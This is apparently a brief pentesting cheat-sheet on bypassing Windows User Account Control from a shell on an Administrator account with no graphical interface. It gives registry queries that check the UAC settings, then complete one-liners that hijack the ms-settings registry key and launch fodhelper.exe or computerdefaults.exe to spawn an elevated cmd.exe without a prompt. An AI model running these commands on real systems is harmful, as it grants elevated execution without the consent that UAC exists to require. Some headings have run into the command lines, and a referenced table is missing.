Use this when we have only a shell of an Administrator account and no graphical UI so we cannot click on the “Run as admin” UAC popup.
Not exactly a privilege escalation technique. Windows does not consider this feature a security setting
UAC enabled?#
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUAREG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdminThere are more to query, but generally those two are good enough.
You can see the meaning of value return in the table down there.
Fodhelper#
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exeComputerdefaults#
reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && start computerdefaults.exe